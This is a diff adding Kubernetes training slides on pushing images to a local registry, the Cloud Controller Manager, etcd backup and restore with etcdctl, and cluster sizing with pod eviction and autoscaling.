|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox $REGISTRY/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push $REGISTRY/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking again what's on our local registry
|
||||
|
||||
- Let's use the same endpoint as before
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
{"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Building and pushing our images
|
||||
|
||||
- We are going to use a convenient feature of Docker Compose
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stacks` directory:
|
||||
```bash
|
||||
cd ~/container.training/stacks
|
||||
```
|
||||
|
||||
- Build and push the images:
|
||||
```bash
|
||||
export REGISTRY
|
||||
export TAG=v0.1
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
rng:
|
||||
build: dockercoins/rng
|
||||
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
|
||||
deploy:
|
||||
mode: global
|
||||
...
|
||||
redis:
|
||||
image: redis
|
||||
...
|
||||
worker:
|
||||
build: dockercoins/worker
|
||||
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
|
||||
...
|
||||
deploy:
|
||||
replicas: 10
|
||||
```
|
||||
|
||||
.warning[Just in case you were wondering ... Docker "services" are not Kubernetes "services".]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Avoiding the `latest` tag
|
||||
|
||||
.warning[Make sure that you've set the `TAG` variable properly!]
|
||||
|
||||
- If you don't, the tag will default to `latest`
|
||||
|
||||
- The problem with `latest`: nobody knows what it points to!
|
||||
|
||||
- the latest commit in the repo?
|
||||
|
||||
- the latest commit in some branch? (Which one?)
|
||||
|
||||
- the latest tag?
|
||||
|
||||
- some random version pushed by a random team member?
|
||||
|
||||
- If you keep pushing the `latest` tag, how do you roll back?
|
||||
|
||||
- Image tags should be meaningful, i.e. correspond to code branches, tags, or hashes
|
||||
|
||||
---
|
||||
|
||||
## Checking the content of the registry
|
||||
|
||||
- All our images should now be in the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Re-run the same `curl` command as earlier:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*In these slides, all the commands to deploy
|
||||
DockerCoins will use a $REGISTRY environment
|
||||
variable, so that we can quickly switch from
|
||||
the self-hosted registry to pre-built images
|
||||
hosted on the Docker Hub. So make sure that
|
||||
this $REGISTRY variable is set correctly when
|
||||
running the exercises!*
|
||||
144
slides/k8s/cloud-controller-manager.md
Normal file
@@ -0,0 +1,144 @@
|
||||
# The Cloud Controller Manager
|
||||
|
||||
- Kubernetes has many features that are cloud-specific
|
||||
|
||||
(e.g. providing cloud load balancers when a Service of type LoadBalancer is created)
|
||||
|
||||
- These features were initially implemented in API server and controller manager
|
||||
|
||||
- Since Kubernetes 1.6, these features are available through a separate process:
|
||||
|
||||
the *Cloud Controller Manager*
|
||||
|
||||
- The CCM is optional, but if we run in a cloud, we probably want it!
|
||||
|
||||
---
|
||||
|
||||
## Cloud Controller Manager duties
|
||||
|
||||
- Creating and updating cloud load balancers
|
||||
|
||||
- Configuring routing tables in the cloud network (specific to GCE)
|
||||
|
||||
- Updating node labels to indicate region, zone, instance type...
|
||||
|
||||
- Obtain node name, internal and external addresses from cloud metadata service
|
||||
|
||||
- Deleting nodes from Kubernetes when they're deleted in the cloud
|
||||
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks...)
|
||||
|
||||
(Eventually, volumes will be managed by the Container Storage Interface)
|
||||
|
||||
---
|
||||
|
||||
## In-tree vs. out-of-tree
|
||||
|
||||
- A number of cloud providers are supported "in-tree"
|
||||
|
||||
(in the main kubernetes/kubernetes repository on GitHub)
|
||||
|
||||
- More cloud providers are supported "out-of-tree"
|
||||
|
||||
(with code in different repositories)
|
||||
|
||||
- There is an [ongoing effort](https://github.com/kubernetes/kubernetes/tree/master/pkg/cloudprovider) to move everything to out-of-tree providers
|
||||
|
||||
---
|
||||
|
||||
## In-tree providers
|
||||
|
||||
The following providers are actively maintained:
|
||||
|
||||
- Amazon Web Services
|
||||
- Azure
|
||||
- Google Compute Engine
|
||||
- IBM Cloud
|
||||
- OpenStack
|
||||
- VMware vSphere
|
||||
|
||||
These ones are less actively maintained:
|
||||
|
||||
- Apache CloudStack
|
||||
- oVirt
|
||||
- VMware Photon
|
||||
|
||||
---
|
||||
|
||||
## Out-of-tree providers
|
||||
|
||||
The list includes the following providers:
|
||||
|
||||
- DigitalOcean
|
||||
|
||||
- keepalived (not exactly a cloud; provides VIPs for load balancers)
|
||||
|
||||
- Linode
|
||||
|
||||
- Oracle Cloud Infrastructure
|
||||
|
||||
(And possibly others; there is no central registry for these.)
|
||||
|
||||
---
|
||||
|
||||
## Audience questions
|
||||
|
||||
- What kind of clouds are you using/planning to use?
|
||||
|
||||
- What kind of details would you like to see in this section?
|
||||
|
||||
- Would you appreciate details on clouds that you don't / won't use?
|
||||
|
||||
---
|
||||
|
||||
## Cloud Controller Manager in practice
|
||||
|
||||
- Write a configuration file
|
||||
|
||||
(typically `/etc/kubernetes/cloud.conf`)
|
||||
|
||||
- Run the CCM process
|
||||
|
||||
(on self-hosted clusters, this can be a DaemonSet selecting the control plane nodes)
|
||||
|
||||
- Start kubelet with `--cloud-provider=external`
|
||||
|
||||
- When using managed clusters, this is done automatically
|
||||
|
||||
- There is very little documentation on writing the configuration file
|
||||
|
||||
(except for OpenStack)
|
||||
|
||||
---
|
||||
|
||||
## Bootstrapping challenges
|
||||
|
||||
- When a node joins the cluster, it needs to obtain a signed TLS certificate
|
||||
|
||||
- That certificate must contain the node's addresses
|
||||
|
||||
- These addresses are provided by the Cloud Controller Manager
|
||||
|
||||
(at least the external address)
|
||||
|
||||
- To get these addresses, the node needs to communicate with the control plane
|
||||
|
||||
- ...Which means joining the cluster
|
||||
|
||||
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
|
||||
|
||||
---
|
||||
|
||||
## More information about CCM
|
||||
|
||||
- CCM configuration and operation is highly specific to each cloud provider
|
||||
|
||||
(which is why this section remains very generic)
|
||||
|
||||
- The Kubernetes documentation has *some* information:
|
||||
|
||||
- [architecture and diagrams](https://kubernetes.io/docs/concepts/architecture/cloud-controller/)
|
||||
|
||||
- [configuration](https://kubernetes.io/docs/concepts/cluster-administration/cloud-providers/) (mainly for OpenStack)
|
||||
|
||||
- [deployment](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/)
|
||||
362
slides/k8s/cluster-backup.md
Normal file
@@ -0,0 +1,362 @@
|
||||
# Backing up clusters
|
||||
|
||||
- Backups can have multiple purposes:
|
||||
|
||||
- disaster recovery (servers or storage are destroyed or unreachable)
|
||||
|
||||
- error recovery (human or process has altered or corrupted data)
|
||||
|
||||
- cloning environments (for testing, validation...)
|
||||
|
||||
- Let's see the strategies and tools available with Kubernetes!
|
||||
|
||||
---
|
||||
|
||||
## Important
|
||||
|
||||
- Kubernetes helps us with disaster recovery
|
||||
|
||||
(it gives us replication primitives)
|
||||
|
||||
- Kubernetes helps us clone / replicate environments
|
||||
|
||||
(all resources can be described with manifests)
|
||||
|
||||
- Kubernetes *does not* help us with error recovery
|
||||
|
||||
- We still need to back up/snapshot our data:
|
||||
|
||||
- with database backups (mysqldump, pgdump, etc.)
|
||||
|
||||
- and/or snapshots at the storage layer
|
||||
|
||||
- and/or traditional full disk backups
|
||||
|
||||
---
|
||||
|
||||
## In a perfect world ...
|
||||
|
||||
- The deployment of our Kubernetes clusters is automated
|
||||
|
||||
(recreating a cluster takes less than a minute of human time)
|
||||
|
||||
- All the resources (Deployments, Services...) on our clusters are under version control
|
||||
|
||||
(never use `kubectl run`; always apply YAML files coming from a repository)
|
||||
|
||||
- Stateful components are either:
|
||||
|
||||
- stored on systems with regular snapshots
|
||||
|
||||
- backed up regularly to an external, durable storage
|
||||
|
||||
- outside of Kubernetes
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes cluster deployment
|
||||
|
||||
- If our deployment system isn't fully automated, it should at least be documented
|
||||
|
||||
- Litmus test: how long does it take to deploy a cluster...
|
||||
|
||||
- for a senior engineer?
|
||||
|
||||
- for a new hire?
|
||||
|
||||
- Does it require external intervention?
|
||||
|
||||
(e.g. provisioning servers, signing TLS certs...)
|
||||
|
||||
---
|
||||
|
||||
## Plan B
|
||||
|
||||
- Full machine backups of the control plane can help
|
||||
|
||||
- If the control plane is in pods (or containers), pay attention to storage drivers
|
||||
|
||||
(if the backup mechanism is not container-aware, the backups can take way more resources than they should, or even be unusable!)
|
||||
|
||||
- If the previous sentence worries you:
|
||||
|
||||
**automate the deployment of your clusters!**
|
||||
|
||||
---
|
||||
|
||||
## Managing our Kubernetes resources
|
||||
|
||||
- Ideal scenario:
|
||||
|
||||
- never create a resource directly on a cluster
|
||||
|
||||
- push to a code repository
|
||||
|
||||
- a special branch (`production` or even `master`) gets automatically deployed
|
||||
|
||||
- Some folks call this "GitOps"
|
||||
|
||||
(it's the logical evolution of configuration management and infrastructure as code)
|
||||
|
||||
---
|
||||
|
||||
## GitOps in theory
|
||||
|
||||
- What do we keep in version control?
|
||||
|
||||
- For very simple scenarios: source code, Dockerfiles, scripts
|
||||
|
||||
- For real applications: add resources (as YAML files)
|
||||
|
||||
- For applications deployed multiple times: Helm, Kustomize...
|
||||
|
||||
(staging and production count as "multiple times")
|
||||
|
||||
---
|
||||
|
||||
## GitOps tooling
|
||||
|
||||
- Various tools exist (Weave Flux, GitKube...)
|
||||
|
||||
- These tools are still very young
|
||||
|
||||
- You still need to write YAML for all your resources
|
||||
|
||||
- There is no tool to:
|
||||
|
||||
- list *all* resources in a namespace
|
||||
|
||||
- get resource YAML in a canonical form
|
||||
|
||||
- diff YAML descriptions with current state
|
||||
|
||||
---
|
||||
|
||||
## GitOps in practice
|
||||
|
||||
- Start describing your resources with YAML
|
||||
|
||||
- Leverage a tool like Kustomize or Helm
|
||||
|
||||
- Make sure that you can easily deploy to a new namespace
|
||||
|
||||
(or even better: to a new cluster)
|
||||
|
||||
- When tooling matures, you will be ready
|
||||
|
||||
---
|
||||
|
||||
## Plan B
|
||||
|
||||
- What if we can't describe everything with YAML?
|
||||
|
||||
- What if we manually create resources and forget to commit them to source control?
|
||||
|
||||
- What about global resources, that don't live in a namespace?
|
||||
|
||||
- How can we be sure that we saved *everything*?
|
||||
|
||||
---
|
||||
|
||||
## Backing up etcd
|
||||
|
||||
- All objects are saved in etcd
|
||||
|
||||
- etcd data should be relatively small
|
||||
|
||||
(and therefore, quick and easy to back up)
|
||||
|
||||
- Two options to back up etcd:
|
||||
|
||||
- snapshot the data directory
|
||||
|
||||
- use `etcdctl snapshot`
|
||||
|
||||
---
|
||||
|
||||
## Making an etcd snapshot
|
||||
|
||||
- The basic command is simple:
|
||||
```bash
|
||||
etcdctl snapshot save <filename>
|
||||
```
|
||||
|
||||
- But we also need to specify:
|
||||
|
||||
- an environment variable to specify that we want etcdctl v3
|
||||
|
||||
- the address of the server to back up
|
||||
|
||||
- the path to the key, certificate, and CA certificate
|
||||
<br/>(if our etcd uses TLS certificates)
|
||||
|
||||
---
|
||||
|
||||
## Snapshotting etcd on kubeadm
|
||||
|
||||
- The following command will work on clusters deployed with kubeadm
|
||||
|
||||
(and maybe others)
|
||||
|
||||
- It should be executed on a master node
|
||||
|
||||
```bash
|
||||
docker run --rm --net host -v $PWD:/vol \
|
||||
-v /etc/kubernetes/pki/etcd:/etc/kubernetes/pki/etcd:ro \
|
||||
-e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
|
||||
etcdctl --endpoints=https://[127.0.0.1]:2379 \
|
||||
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
|
||||
--cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
|
||||
--key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
|
||||
snapshot save /vol/snapshot
|
||||
```
|
||||
|
||||
- It will create a file named `snapshot` in the current directory
|
||||
|
||||
---
|
||||
|
||||
## How can we remember all these flags?
|
||||
|
||||
- Look at the static pod manifest for etcd
|
||||
|
||||
(in `/etc/kubernetes/manifests`)
|
||||
|
||||
- The healthcheck probe is calling `etcdctl` with all the right flags
|
||||
😉👍✌️
|
||||
|
||||
- Exercise: write the YAML for a batch job to perform the backup
|
||||
|
||||
---
|
||||
|
||||
## Restoring an etcd snapshot
|
||||
|
||||
- ~~Execute exactly the same command, but replacing `save` with `restore`~~
|
||||
|
||||
(Believe it or not, doing that will *not* do anything useful!)
|
||||
|
||||
- The `restore` command does *not* load a snapshot into a running etcd server
|
||||
|
||||
- The `restore` command creates a new data directory from the snapshot
|
||||
|
||||
(it's an offline operation; it doesn't interact with an etcd server)
|
||||
|
||||
- It will create a new data directory in a temporary container
|
||||
|
||||
(leaving the running etcd node untouched)
|
||||
|
||||
---
|
||||
|
||||
## When using kubeadm
|
||||
|
||||
1. Create a new data directory from the snapshot:
|
||||
```bash
|
||||
sudo rm -rf /var/lib/etcd
|
||||
docker run --rm -v /var/lib:/var/lib -v $PWD:/vol \
|
||||
-e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
|
||||
etcdctl snapshot restore /vol/snapshot --data-dir=/var/lib/etcd
|
||||
```
|
||||
|
||||
2. Provision the control plane, using that data directory:
|
||||
```bash
|
||||
sudo kubeadm init \
|
||||
--ignore-preflight-errors=DirAvailable--var-lib-etcd
|
||||
```
|
||||
|
||||
3. Rejoin the other nodes
|
||||
|
||||
---
|
||||
|
||||
## The fine print
|
||||
|
||||
- This only saves etcd state
|
||||
|
||||
- It **does not** save persistent volumes and local node data
|
||||
|
||||
- Some critical components (like the pod network) might need to be reset
|
||||
|
||||
- As a result, our pods might have to be recreated, too
|
||||
|
||||
- If we have proper liveness checks, this should happen automatically
|
||||
|
||||
---
|
||||
|
||||
## More information about etcd backups
|
||||
|
||||
- [Kubernetes documentation](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#built-in-snapshot) about etcd backups
|
||||
|
||||
- [etcd documentation](https://coreos.com/etcd/docs/latest/op-guide/recovery.html#snapshotting-the-keyspace) about snapshots and restore
|
||||
|
||||
- [A good blog post by elastisys](https://elastisys.com/2018/12/10/backup-kubernetes-how-and-why/) explaining how to restore a snapshot
|
||||
|
||||
- [Another good blog post by consol labs](https://labs.consol.de/kubernetes/2018/05/25/kubeadm-backup.html) on the same topic
|
||||
|
||||
---
|
||||
|
||||
## Don't forget ...
|
||||
|
||||
- Also back up the TLS information
|
||||
|
||||
(at the very least: CA key and cert; API server key and cert)
|
||||
|
||||
- With clusters provisioned by kubeadm, this is in `/etc/kubernetes/pki`
|
||||
|
||||
- If you don't:
|
||||
|
||||
- you will still be able to restore etcd state and bring everything back up
|
||||
|
||||
- you will need to redistribute user certificates
|
||||
|
||||
.warning[**TLS information is highly sensitive!
|
||||
<br/>Anyone who has it has full access to your cluster!**]
|
||||
|
||||
---
|
||||
|
||||
## Stateful services
|
||||
|
||||
- It's totally fine to keep your production databases outside of Kubernetes
|
||||
|
||||
*Especially if you have only one database server!*
|
||||
|
||||
- Feel free to put development and staging databases on Kubernetes
|
||||
|
||||
(as long as they don't hold important data)
|
||||
|
||||
- Using Kubernetes for stateful services makes sense if you have *many*
|
||||
|
||||
(because then you can leverage Kubernetes automation)
|
||||
|
||||
---
|
||||
|
||||
## Snapshotting persistent volumes
|
||||
|
||||
- Option 1: snapshot volumes out of band
|
||||
|
||||
(with the API/CLI/GUI of our SAN/cloud/...)
|
||||
|
||||
- Option 2: storage system integration
|
||||
|
||||
(e.g. [Portworx](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/) can [create snapshots through annotations](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/snaps-annotations/#taking-periodic-snapshots-on-a-running-pod))
|
||||
|
||||
- Option 3: [snapshots through Kubernetes API](https://kubernetes.io/blog/2018/10/09/introducing-volume-snapshot-alpha-for-kubernetes/)
|
||||
|
||||
(now in alpha for a few storage providers: GCE, OpenSDS, Ceph, Portworx)
|
||||
|
||||
---
|
||||
|
||||
## More backup tools
|
||||
|
||||
- [Stash](https://appscode.com/products/stash/)
|
||||
|
||||
back up Kubernetes persistent volumes
|
||||
|
||||
- [ReShifter](https://github.com/mhausenblas/reshifter)
|
||||
|
||||
cluster state management
|
||||
|
||||
- ~~Heptio Ark~~ [Velero](https://github.com/heptio/velero)
|
||||
|
||||
full cluster backup
|
||||
|
||||
- [kube-backup](https://github.com/pieterlange/kube-backup)
|
||||
|
||||
simple scripts to save resource YAML to a git repository
|
||||
167
slides/k8s/cluster-sizing.md
Normal file
@@ -0,0 +1,167 @@
|
||||
# Cluster sizing
|
||||
|
||||
- What happens when the cluster gets full?
|
||||
|
||||
- How can we scale up the cluster?
|
||||
|
||||
- Can we do it automatically?
|
||||
|
||||
- What are other methods to address capacity planning?
|
||||
|
||||
---
|
||||
|
||||
## When are we out of resources?
|
||||
|
||||
- kubelet monitors node resources:
|
||||
|
||||
- memory
|
||||
|
||||
- node disk usage (typically the root filesystem of the node)
|
||||
|
||||
- image disk usage (where container images and RW layers are stored)
|
||||
|
||||
- For each resource, we can provide two thresholds:
|
||||
|
||||
- a hard threshold (if it's met, it provokes immediate action)
|
||||
|
||||
- a soft threshold (provokes action only after a grace period)
|
||||
|
||||
- Resource thresholds and grace periods are configurable
|
||||
|
||||
(by passing kubelet command-line flags)
|
||||
|
||||
---
|
||||
|
||||
## What happens then?
|
||||
|
||||
- If disk usage is too high:
|
||||
|
||||
- kubelet will try to remove terminated pods
|
||||
|
||||
- then, it will try to *evict* pods
|
||||
|
||||
- If memory usage is too high:
|
||||
|
||||
- it will try to evict pods
|
||||
|
||||
- The node is marked as "under pressure"
|
||||
|
||||
- This temporarily prevents new pods from being scheduled on the node
|
||||
|
||||
---
|
||||
|
||||
## Which pods get evicted?
|
||||
|
||||
- kubelet looks at the pods' QoS and PriorityClass
|
||||
|
||||
- First, pods with BestEffort QoS are considered
|
||||
|
||||
- Then, pods with Burstable QoS exceeding their *requests*
|
||||
|
||||
(but only if the exceeding resource is the one that is low on the node)
|
||||
|
||||
- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
|
||||
|
||||
- Within each group, pods are sorted by PriorityClass
|
||||
|
||||
- If there are pods with the same PriorityClass, they are sorted by usage excess
|
||||
|
||||
(i.e. the pods whose usage exceeds their requests the most are evicted first)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Eviction of Guaranteed pods
|
||||
|
||||
- *Normally*, pods with Guaranteed QoS should not be evicted
|
||||
|
||||
- A chunk of resources is reserved for node processes (like kubelet)
|
||||
|
||||
- It is expected that these processes won't use more than this reservation
|
||||
|
||||
- If they do use more resources anyway, all bets are off!
|
||||
|
||||
- If this happens, kubelet must evict Guaranteed pods to preserve node stability
|
||||
|
||||
(or Burstable pods that are still within their requested usage)
|
||||
|
||||
---
|
||||
|
||||
## What happens to evicted pods?
|
||||
|
||||
- The pod is terminated
|
||||
|
||||
- It is marked as `Failed` at the API level
|
||||
|
||||
- If the pod was created by a controller, the controller will recreate it
|
||||
|
||||
- The pod will be recreated on another node, *if there are resources available!*
|
||||
|
||||
- For more details about the eviction process, see:
|
||||
|
||||
- [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
|
||||
|
||||
- [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
|
||||
|
||||
---
|
||||
|
||||
## What if there are no resources available?
|
||||
|
||||
- Sometimes, a pod cannot be scheduled anywhere:
|
||||
|
||||
- all the nodes are under pressure,
|
||||
|
||||
- or the pod requests more resources than are available
|
||||
|
||||
- The pod then remains in `Pending` state until the situation improves
|
||||
|
||||
---
|
||||
|
||||
## Cluster scaling
|
||||
|
||||
- One way to improve the situation is to add new nodes
|
||||
|
||||
- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
|
||||
|
||||
- The autoscaler will automatically scale up:
|
||||
|
||||
- if there are pods that failed to be scheduled
|
||||
|
||||
- The autoscaler will automatically scale down:
|
||||
|
||||
- if nodes have a low utilization for an extended period of time
|
||||
|
||||
---
|
||||
|
||||
## Restrictions, gotchas ...
|
||||
|
||||
- The Cluster Autoscaler only supports a few cloud infrastructures
|
||||
|
||||
(see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list)
|
||||
|
||||
- The Cluster Autoscaler cannot scale down nodes that have pods using:
|
||||
|
||||
- local storage
|
||||
|
||||
- affinity/anti-affinity rules preventing them from being rescheduled
|
||||
|
||||
- a restrictive PodDisruptionBudget
|
||||
|
||||
---
|
||||
|
||||
## Other way to do capacity planning
|
||||
|
||||
- "Running Kubernetes without nodes"
|
||||
|
||||
- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
|
||||
|
||||
- Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
|
||||
|
||||
- Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
|
||||
|
||||
- Economic advantage (no wasted capacity)
|
||||
|
||||
- Security advantage (stronger isolation between pods)
|
||||
|
||||
Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.
|
||||